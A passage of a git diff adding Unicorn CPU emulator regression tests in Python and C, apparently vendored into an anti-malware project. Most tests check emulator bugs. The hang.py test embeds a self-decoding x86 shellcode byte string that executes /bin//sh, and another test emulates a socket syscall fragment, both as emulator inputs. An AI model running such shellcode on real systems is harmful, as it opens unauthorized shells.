free resources + printf("uc_close()\n"); + uc_close(uc); + + if( test_passed_ok ) + printf("\n\nTEST PASSED!\n\n"); + else + printf("\n\nTEST FAILED!\n\n"); + + // dynamically free shared library +#ifdef DYNLOAD + uc_dyn_free(); +#endif + + return 0; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_stop_segfault.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_stop_segfault.py new file mode 100644 index 0000000..8c22e9d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_stop_segfault.py @@ -0,0 +1,20 @@ +#!/usr/bin/python + +"""See https://github.com/unicorn-engine/unicorn/issues/65""" + +import unicorn +import regress + +class EmuStopSegFault(regress.RegressTest): + + def runTest(self): + ADDR = 0x10101000 + mu = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) + mu.mem_map(ADDR, 1024 * 4) + mu.mem_write(ADDR, b'\x41') + mu.emu_start(ADDR, ADDR + 1, count=1) + # The following should not trigger a null pointer dereference + self.assertEqual(None, mu.emu_stop()) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/ensure_typedef_consts_generated.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/ensure_typedef_consts_generated.py new file mode 100644 index 0000000..04948a5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/ensure_typedef_consts_generated.py @@ -0,0 +1,15 @@ +#!/usr/bin/python + +"""See https://github.com/unicorn-engine/unicorn/issues/161 + +Ensure that constants which are specified via a typedef, rather than an enum, +are included in the bindings by the script for autogenerating mappings for +constants. 
+""" + +import unicorn + +try: + unicorn.UC_HOOK_MEM_UNMAPPED +except AttributeError: + assert(False and "Definition for UC_HOOK_MEM_UNMAPPED not generated") diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/fpu_ip.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/fpu_ip.py new file mode 100644 index 0000000..3db6a8b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/fpu_ip.py @@ -0,0 +1,69 @@ +#!/usr/bin/python +from unicorn import * +from unicorn.x86_const import * +from capstone import * +import regress + +ESP = 0x2000 +PAGE_SIZE = 2 * 1024 * 1024 + +# mov [esp], DWORD 0x37f +# fldcw [esp] +# fnop +# fnstenv [esp + 8] +# pop ecx +CODE = b'\xc7\x04\x24\x7f\x03\x00\x00\xd9\x2c\x24\xd9\xd0\xd9\x74\x24\x08\x59' + +class SimpleEngine: + def __init__(self): + self.capmd = Cs(CS_ARCH_X86, CS_MODE_32) + + def disas_single(self, data): + for i in self.capmd.disasm(data, 16): + print("\t%s\t%s" % (i.mnemonic, i.op_str)) + break + +disasm = SimpleEngine() + +def hook_code(uc, addr, size, user_data): + mem = uc.mem_read(addr, size) + print(" 0x%X:" % (addr)), + disasm.disas_single(str(mem)) + +class FpuIP(regress.RegressTest): + + def mem_reader(self, mu, addr, size, expected): + tmp = mu.mem_read(addr, size) + for out, exp in zip(tmp, expected): + self.assertEqual(exp, out) + + def test_32(self): + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + mu.mem_map(0x0, PAGE_SIZE) + mu.mem_write(0x4000, CODE) + mu.reg_write(UC_X86_REG_ESP, ESP) + mu.hook_add(UC_HOOK_CODE, hook_code) + + mu.emu_start(0x4000, 0, 0, 5) + esp = mu.reg_read(UC_X86_REG_ESP) + self.assertEqual(0x2004, esp) + expected = [0x0, 0x0, 0xa, 0x40] + self.mem_reader(mu, esp + 14, 4, expected) + + def test_64(self): + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + mu.mem_map(0x0, PAGE_SIZE) + mu.mem_write(0x4000, CODE) + mu.reg_write(UC_X86_REG_ESP, ESP) + mu.hook_add(UC_HOOK_CODE, hook_code) + + mu.emu_start(0x4000, 0, 0, 5) + rsp = mu.reg_read(UC_X86_REG_RSP) + self.assertEqual(0x2012, 
rsp + 10) + expected = [0x0, 0x0, 0xa, 0x40, 0x0, 0x0, 0x0, 0x0] + self.mem_reader(mu, rsp + 10, 4, expected) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/fpu_mem_write.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/fpu_mem_write.py new file mode 100644 index 0000000..4017dec --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/fpu_mem_write.py @@ -0,0 +1,38 @@ +#!/usr/bin/python +from unicorn import * +from unicorn.x86_const import * + +import regress + +ESP = 0x2000 +PAGE_SIZE = 1 * 1024 * 1024 + +# wait +# fnstcw word ptr [esp] +# pop ecx +CODE = b'\x9B\xD9\x3C\x24\x59' + +def hook_mem_write(uc, access, address, size, value, user_data): + print("mem WRITE: 0x%x, data size = %u, data value = 0x%x" % (address, size, value)) + return True + +class FpuWrite(regress.RegressTest): + + def mem_reader(self, mu, addr, size, expected): + tmp = mu.mem_read(addr, size) + for i, e in zip(tmp, expected): + self.assertEquals(e, i) + + def runTest(self): + mu = Uc(UC_ARCH_X86, UC_MODE_32) + mu.mem_map(0, PAGE_SIZE) + mu.mem_write(0, CODE) + mu.reg_write(UC_X86_REG_ESP, ESP) + + mu.hook_add(UC_HOOK_MEM_WRITE, hook_mem_write) + mu.emu_start(0x0, 5, 0, 2) + esp = mu.reg_read(UC_X86_REG_ESP) + self.mem_reader(mu, esp, 10, [0] * 10) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/hang.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hang.py new file mode 100644 index 0000000..9c8a377 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hang.py @@ -0,0 +1,57 @@ +#!/usr/bin/python + +from __future__ import print_function +from unicorn import * +from unicorn.x86_const import * + +import regress + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + tmp = uc.mem_read(address, size) + print("[0x%x] =" %(address), end="") + for i in tmp: + print(" %02x" %i, end="") + 
print("") + +# callback for tracing Linux interrupt +def hook_intr(uc, intno, user_data): + # only handle Linux syscall + rip = uc.reg_read(UC_X86_REG_RIP) + if intno != 0x80: + print("=== 0x%x: got interrupt %x, quit" %(rip, intno)); + uc.emu_stop() + return + + eax = uc.reg_read(UC_X86_REG_EAX) + print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" %(rip, intno, eax)) + +class Hang(regress.RegressTest): + + def runTest(self): + binary1 = b'\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41\x41\x41\x41\x41' + + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + mu.mem_map(0, 2 * 1024 * 1024) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # handle interrupt ourself + mu.hook_add(UC_HOOK_INTR, hook_intr) + + # setup stack + mu.reg_write(UC_X86_REG_RSP, 1024 * 1024) + + # fill in memory with 0xCC (software breakpoint int 3) + for i in xrange(1 * 1024): + mu.mem_write(0 + i, b'\xcc') + + # write machine code to be emulated to memory + mu.mem_write(0, binary1) + + self.assertEqual(mu.emu_start(0, len(binary1)), None) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_add_crash.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_add_crash.py new file mode 100644 index 0000000..342e7fa --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_add_crash.py @@ -0,0 +1,16 @@ +#!/usr/bin/env python + +"""https://github.com/unicorn-engine/unicorn/issues/165""" + +import unicorn + +def hook_mem_read_unmapped(mu, access, address, size, value, user_data): + pass + +mu = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) + +try: + for x in range(0, 1000): + mu.hook_add(unicorn.UC_HOOK_MEM_READ_UNMAPPED, hook_mem_read_unmapped, None) +except 
unicorn.UcError as e: + print("ERROR: %s" % e) diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_code_add_del.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_code_add_del.py new file mode 100644 index 0000000..ef071ca --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_code_add_del.py @@ -0,0 +1,48 @@ +#!/usr/bin/python + +'''https://github.com/unicorn-engine/unicorn/issues/334''' + +from __future__ import print_function +import regress + +from unicorn import * +from unicorn.x86_const import * + +ADDRESS = 0x8048000 +STACK_ADDRESS = 0xffff000 +STACK_SIZE = 4096 +''' +31 DB xor ebx, ebx +53 push ebx +43 inc ebx +53 push ebx +6A 02 push 2 +6A 66 push 66h +58 pop eax +89 E1 mov ecx, esp +CD 80 int 80h +''' +CODE = "\x31\xDB\x53\x43\x53\x6A\x02\x6A\x66\x58\x89\xE1\xCD\x80" +EP = ADDRESS + 0x54 + +def hook_code(mu, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) + +class HookCodeAddDelTest(regress.RegressTest): + def runTest(self): + emu = Uc(UC_ARCH_X86, UC_MODE_32) + emu.mem_map(ADDRESS, 0x1000) + emu.mem_write(EP, CODE) + + emu.mem_map(STACK_ADDRESS, STACK_SIZE) + emu.reg_write(UC_X86_REG_ESP, STACK_ADDRESS + STACK_SIZE) + + # UC_HOOK_CODE hook will work even after deletion + i = emu.hook_add(UC_HOOK_CODE, hook_code, None) + emu.hook_del(i) + + emu.emu_start(EP, EP + len(CODE), count = 3) + print("EIP: 0x%x" % emu.reg_read(UC_X86_REG_EIP)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_code_stop_emu.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_code_stop_emu.py new file mode 100644 index 0000000..33f2f8f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_code_stop_emu.py @@ -0,0 +1,91 @@ +#!/usr/bin/python + +from __future__ import print_function +import binascii +import regress + +from unicorn import * +from unicorn.x86_const 
import * + + +CODE = binascii.unhexlify(b"".join([ + b"48c7c003000000", # mov rax, 3 mapped: 0x1000 + b"0f05", # syscall mapped: 0x1007 + b"48c7c700400000", # mov rdi, 0x4000 mapped: 0x1009 + b"488907", # mov [rdi], rdx mapped: 0x1010 + b"488b07", # mov rdx, [rdi] mapped: 0x1013 + b"4883c201", # add rdx, 1 mapped: 0x1016 + ])) + + +class SingleStepper: + def __init__(self, emu, test): + self._emu = emu + self._hit_count = 0 + self._test = test + + def _stop_hook(self, uc, address, *args, **kwargs): + if self._hit_count == 0: + self._hit_count += 1 + else: + self._test.assertEqual(1, self._hit_count, "HOOK_CODE invoked too many times") + uc.emu_stop() + + def step(self): + self._hit_count = 0 + h = self._emu.hook_add(UC_HOOK_CODE, self._stop_hook) + try: + pc = self._emu.reg_read(UC_X86_REG_RIP) + self._emu.emu_start(pc, pc+0x20) + finally: + self._emu.hook_del(h) + + +def showpc(mu): + pc = mu.reg_read(UC_X86_REG_RIP) + print("pc: 0x%x" % (pc)) + + +class HookCodeStopEmuTest(regress.RegressTest): + def test_hook_code_stop_emu(self): + try: + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + # base of CODE + mu.mem_map(0x1000, 0x1000) + mu.mem_write(0x1000, CODE) + + # scratch, used by CODE + mu.mem_map(0x4000, 0x1000) + + mu.reg_write(UC_X86_REG_RDX, 0x1) + mu.reg_write(UC_X86_REG_RIP, 0x1000) + + # 0x1000: 48c7c003000000 mov rax, 3 + # 0x1007: 0f05 syscall + # 0x1009: 48c7c700400000 mov rdi, 0x4000 + # 0x1010: 488907 mov [rdi], rdx + # 0x1013: 488b07 mov rdx, [rdi] + # 0x1016: 4883c201 add rdx, 1 + + stepper = SingleStepper(mu, self) + showpc(mu) + self.assertEqual(0x1000, mu.reg_read(UC_X86_REG_RIP), "Unexpected PC") + + + stepper.step() + showpc(mu) + self.assertEqual(0x1007, mu.reg_read(UC_X86_REG_RIP), + "Emulator failed to stop after one instruction") + + stepper.step() + showpc(mu) + self.assertEqual(0x1009, mu.reg_read(UC_X86_REG_RIP), + "Emulator failed to stop after one instruction") + + except UcError as e: + self.assertFalse(0, "ERROR: %s" % e) + + +if __name__ == 
'__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_extrainvoke.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_extrainvoke.c new file mode 100644 index 0000000..8fd486f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_extrainvoke.c @@ -0,0 +1,93 @@ +#include +#include + +#include + +#define X86_CODE32 "\xf3\xab" // rep stosd dword ptr es:[edi], eax -> Fill (E)CX doublewords at ES:[(E)DI] with EAX +#define ADDRESS 0x1000000 +#define ECX_OPS 2 +static long unsigned int hook_called = 0; + +void hook_ins(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + hook_called++; + printf("hook called\n"); +} + +static void VM_exec() +{ + uc_engine *uc; + uc_err err; + uc_hook trace; + unsigned int r_eax, eflags, r_esp, r_edi, r_ecx; + + r_eax = 0xbaadbabe; + r_esp = ADDRESS+0x20; + r_edi = ADDRESS+0x300; //some safe distance from main code. + eflags = 0x00000206; + r_ecx = ECX_OPS; + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if(err) + { + printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); + return; + } + + err = uc_mem_map(uc, ADDRESS, (2 * 1024 * 1024), UC_PROT_ALL); + if(err != UC_ERR_OK) + { + printf("Failed to map memory %s\n", uc_strerror(err)); + return; + } + + // write machine code to be emulated to memory + err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1); + if(err != UC_ERR_OK) + { + printf("Failed to write emulation code to memory, quit!: %s(len %lu)\n", uc_strerror(err), (unsigned long)sizeof(X86_CODE32) - 1); + return; + } + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); + uc_reg_write(uc, UC_X86_REG_EDI, &r_edi); + uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); + uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); //make stack pointer point to already mapped memory so we don't need to hook. 
+ uc_reg_write(uc, UC_X86_REG_EFLAGS, &eflags); + + uc_hook_add(uc, &trace, UC_HOOK_CODE, (void *)hook_ins, NULL, 1, 0); + + // emulate machine code in infinite time + err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0); + if(err) + { + printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + + uc_close(uc); + return; + } + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); + uc_reg_read(uc, UC_X86_REG_EDI, &r_edi); + uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags); + + uc_close(uc); + + printf("\n>>> Emulation done. Below is the CPU context\n"); + printf(">>> EAX = 0x%08X\n", r_eax); + printf(">>> ECX = 0x%08X\n", r_ecx); + printf(">>> EDI = 0x%08X\n", r_edi); + printf(">>> EFLAGS = 0x%08X\n", eflags); + + printf("\nHook called %lu times. Test %s\n", hook_called, (hook_called == ECX_OPS ? "PASSED!!" : "FAILED!!!")); + +} + +int main(int argc, char *argv[]) +{ + VM_exec(); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_readonly_write_local.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_readonly_write_local.py new file mode 100644 index 0000000..76b1589 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_readonly_write_local.py @@ -0,0 +1,30 @@ +#!/usr/bin/python +from unicorn import * +from unicorn.x86_const import * +import regress + +PAGE_SIZE = 4 * 1024 +ACCESS_ADDR = 0x1000 + +# mov eax, [0x1000] +# mov eax, [0x1000] +CODE = b'\xA1\x00\x10\x00\x00\xA1\x00\x10\x00\x00' + +def hook_mem_read(uc, access, address, size, value, data): + print("Reading at " + str(address)) + uc.mem_write(address, CODE); + +class REP(regress.RegressTest): + + def test_rep(self): + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + mu.mem_map(0, PAGE_SIZE) + mu.mem_write(0, CODE) + mu.mem_map(ACCESS_ADDR, PAGE_SIZE, UC_PROT_READ); + mu.hook_add(UC_HOOK_MEM_READ, hook_mem_read, begin = ACCESS_ADDR, end = ACCESS_ADDR + PAGE_SIZE) + + 
mu.emu_start(0, len(CODE)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/init.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/init.py new file mode 100644 index 0000000..024ea39 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/init.py @@ -0,0 +1,68 @@ +#!/usr/bin/python +# By Mariano Graziano + +from unicorn import * +from unicorn.x86_const import * + +import regress, struct + +mu = 0 + +class Init(regress.RegressTest): + + def init_unicorn(self, ip, sp, counter): + global mu + #print "[+] Emulating IP: %x SP: %x - Counter: %x" % (ip, sp, counter) + mu = Uc(UC_ARCH_X86, UC_MODE_64) + mu.mem_map(0x1000000, 2 * 1024 * 1024) + mu.mem_write(0x1000000, "\x90") + mu.mem_map(0x8000000, 8 * 1024 * 1024) + mu.reg_write(UC_X86_REG_RSP, sp) + content = self.generate_value(counter) + mu.mem_write(sp, content) + self.set_hooks() + + def generate_value(self, counter): + start = 0xffff880026f02000 + offset = counter * 8 + address = start + offset + return struct.pack(">> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" %(address, size, value) + address_page = address & 0xFFFFFFFFFFFFF000 + mu.mem_map(address_page, 2 * 1024 * 1024) + mu.mem_write(address, str(value)) + return True + else: + return False + + def hook_mem_fetch_unmapped(self, uc, access, address, size, value, user_data): + global mu + print "[ HOOK_MEM_FETCH - Address: %s ]" % hex(address).strip("L") + print "[ mem_fetch_unmapped: faulting address at %s ]" % hex(address).strip("L") + mu.mem_write(0x1000003, "\x90") + mu.reg_write(UC_X86_REG_RIP, 0x1000001) + return True + + def runTest(self): + global mu + ips = list(xrange(0x1000000, 0x1001000, 0x1)) + sps = list(xrange(0x8000000, 0x8001000, 0x1)) + j = 0 + for i in ips: + j += 1 + index = ips.index(i) + self.init_unicorn(i, sps[index], j) + mu.emu_start(0x1000000, 0x1000000 + 0x1) + +if __name__ == '__main__': + regress.main() diff --git 
a/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_read_in_cpu_tb_exec.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_read_in_cpu_tb_exec.c new file mode 100644 index 0000000..01e8a98 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_read_in_cpu_tb_exec.c @@ -0,0 +1,33 @@ +#include + +static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_block(%p, %"PRIx64", %d, %p)\n", uc, address, size, user_data); +} + +/* + * Disassembly according to capstone: + * add byte ptr [rip - 1], 0x30 + * jmp 0x1000000 + */ +#define BINARY "\x80\x05\xff\xff\xff\xff\x30\xeb\xf7\x30" +#define MEMORY_SIZE 2 * 1024 * 1024 +#define STARTING_ADDRESS 0x1000000 + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(UC_ARCH_X86, UC_MODE_64, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, STARTING_ADDRESS, MEMORY_SIZE, UC_PROT_ALL); + if (uc_mem_write(uc, STARTING_ADDRESS, BINARY, sizeof(BINARY) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook hook; + uc_hook_add(uc, &hook, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, STARTING_ADDRESS, STARTING_ADDRESS + sizeof(BINARY) - 1, 0, 20); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_read_in_tb_flush_x86_64.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_read_in_tb_flush_x86_64.c new file mode 100644 index 0000000..dc2ca49 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_read_in_tb_flush_x86_64.c @@ -0,0 +1,27 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_X86 +#define HARDWARE_MODE UC_MODE_64 + +#define MEMORY_STARTING_ADDRESS 0x1000000 +#define MEMORY_SIZE 2 * 1024 * 1024 +#define MEMORY_PERMISSIONS UC_PROT_READ + +#define BINARY_CODE "\x90" + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; 
+ if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 20); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_write.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_write.py new file mode 100644 index 0000000..b37305f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_write.py @@ -0,0 +1,47 @@ +#!/usr/bin/env python +# Test callback that returns False to cancel emulation + +from __future__ import print_function +from unicorn import * +from unicorn.x86_const import * + +import regress + +X86_CODE32_MEM_WRITE = b"\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov [0xaaaaaaaa], ecx; INC ecx; DEC edx + + +# callback for tracing invalid memory access (READ or WRITE) +def hook_mem_invalid(uc, access, address, size, value, user_data): + return False + + +class InvalidWrite(regress.RegressTest): + def test(self): + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # memory address where emulation starts + ADDRESS = 0x1000000 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_MEM_WRITE) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # intercept invalid memory events + mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, hook_mem_invalid) + + try: + # emulation should return with error UC_ERR_WRITE_UNMAPPED + mu.emu_start(ADDRESS, ADDRESS + 
len(X86_CODE32_MEM_WRITE)) + except UcError as e: + self.assertEqual(e.errno, UC_ERR_WRITE_UNMAPPED) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_write_in_cpu_tb_exec_x86_64.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_write_in_cpu_tb_exec_x86_64.c new file mode 100644 index 0000000..47c19f0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_write_in_cpu_tb_exec_x86_64.c @@ -0,0 +1,26 @@ +#include + +/* + * Disassembly according to capstone: + * mulx rsp, rsp, rdx + */ +#define BINARY "\xc4\xe2\xdb\xf6\xe2" +#define MEMORY_SIZE 2 * 1024 * 1024 +#define STARTING_ADDRESS 0x1000000 + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(UC_ARCH_X86, UC_MODE_64, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, STARTING_ADDRESS, MEMORY_SIZE, UC_PROT_ALL); + if (uc_mem_write(uc, STARTING_ADDRESS, BINARY, sizeof(BINARY) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, STARTING_ADDRESS, STARTING_ADDRESS + sizeof(BINARY) - 1, 0, 20); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/jmp_ebx_hang.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/jmp_ebx_hang.py new file mode 100644 index 0000000..5b3952c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/jmp_ebx_hang.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python + +"""See https://github.com/unicorn-engine/unicorn/issues/82""" + +import unicorn +from unicorn import * +import regress + +CODE_ADDR = 0x10101000 +CODE = b'\xff\xe3' # jmp ebx + +class JumEbxHang(regress.RegressTest): + + def runTest(self): + mu = unicorn.Uc(UC_ARCH_X86, UC_MODE_32) + mu.mem_map(CODE_ADDR, 1024 * 4) + mu.mem_write(CODE_ADDR, CODE) + # If EBX is zero then an exception is raised, as expected + 
mu.reg_write(unicorn.x86_const.UC_X86_REG_EBX, 0x0) + + print(">>> jmp ebx (ebx = 0)"); + with self.assertRaises(UcError) as m: + mu.emu_start(CODE_ADDR, CODE_ADDR + 2, count=1) + + self.assertEqual(m.exception.errno, UC_ERR_FETCH_UNMAPPED) + + print(">>> jmp ebx (ebx = 0xaa96a47f)"); + mu = unicorn.Uc(UC_ARCH_X86, UC_MODE_32) + mu.mem_map(CODE_ADDR, 1024 * 4) + # If we write this address to EBX then the emulator hangs on emu_start + mu.reg_write(unicorn.x86_const.UC_X86_REG_EBX, 0xaa96a47f) + mu.mem_write(CODE_ADDR, CODE) + with self.assertRaises(UcError) as m: + mu.emu_start(CODE_ADDR, CODE_ADDR + 2, count=1) + + self.assertEqual(m.exception.errno, UC_ERR_FETCH_UNMAPPED) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/jumping.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/jumping.py new file mode 100644 index 0000000..265ec07 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/jumping.py @@ -0,0 +1,167 @@ +#!/usr/bin/env python +# Mariano Graziano + +from unicorn import * +from unicorn.x86_const import * + +import regress + +#echo -ne "\x48\x31\xc0\x48\xb8\x04\x00\x00\x00\x00\x00\x00\x00\x48\x3d\x05\x00\x00\x00\x74\x05\xe9\x0f\x00\x00\x00\x48\xba\xbe\xba\x00\x00\x00\x00\x00\x00\xe9\x0f\x00\x00\x00\x48\xba\xca\xc0\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x90" | ndisasm - -b64 +#00000000 4831C0 xor rax,rax +#00000003 48B8040000000000 mov rax,0x4 +# -0000 +#0000000D 483D05000000 cmp rax,0x5 +#00000013 7405 jz 0x1a +#00000015 E90F000000 jmp qword 0x29 +#0000001A 48BABEBA00000000 mov rdx,0xbabe +# -0000 +#00000024 E90F000000 jmp qword 0x38 +#00000029 48BACAC000000000 mov rdx,0xc0ca +# -0000 +#00000033 E900000000 jmp qword 0x38 +#00000038 90 nop + + +mu = 0 +zf = 1 # (0:clear, 1:set) + + +class Init(regress.RegressTest): + def clear_zf(self): + eflags_cur = mu.reg_read(UC_X86_REG_EFLAGS) + eflags = eflags_cur & ~(1 << 6) + #eflags = 0x0 + print "[clear_zf] - eflags from 
%x to %x" % (eflags_cur, eflags) + if eflags != eflags_cur: + print "[clear_zf] - writing new eflags..." + mu.reg_write(UC_X86_REG_EFLAGS, eflags) + + def set_zf(self): + eflags_cur = mu.reg_read(UC_X86_REG_EFLAGS) + eflags = eflags_cur | (1 << 6) + #eflags = 0xFFFFFFFF + print "[set_zf] - eflags from %x to %x" % (eflags_cur, eflags) + if eflags != eflags_cur: + print "[set_zf] - writing new eflags..." + mu.reg_write(UC_X86_REG_EFLAGS, eflags) + + def handle_zf(self, zf): + print "[handle_zf] - eflags " , zf + if zf == 0: self.clear_zf() + else: self.set_zf() + + def multipath(self): + print "[multipath] - handling ZF (%s) - default" % zf + self.handle_zf(zf) + + # callback for tracing basic blocks + def hook_block(self, uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + # callback for tracing instructions + def hook_code(self, uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) + rax = mu.reg_read(UC_X86_REG_RAX) + rbx = mu.reg_read(UC_X86_REG_RBX) + rcx = mu.reg_read(UC_X86_REG_RCX) + rdx = mu.reg_read(UC_X86_REG_RDX) + rsi = mu.reg_read(UC_X86_REG_RSI) + rdi = mu.reg_read(UC_X86_REG_RDI) + r8 = mu.reg_read(UC_X86_REG_R8) + r9 = mu.reg_read(UC_X86_REG_R9) + r10 = mu.reg_read(UC_X86_REG_R10) + r11 = mu.reg_read(UC_X86_REG_R11) + r12 = mu.reg_read(UC_X86_REG_R12) + r13 = mu.reg_read(UC_X86_REG_R13) + r14 = mu.reg_read(UC_X86_REG_R14) + r15 = mu.reg_read(UC_X86_REG_R15) + eflags = mu.reg_read(UC_X86_REG_EFLAGS) + + print(">>> RAX = %x" %rax) + print(">>> RBX = %x" %rbx) + print(">>> RCX = %x" 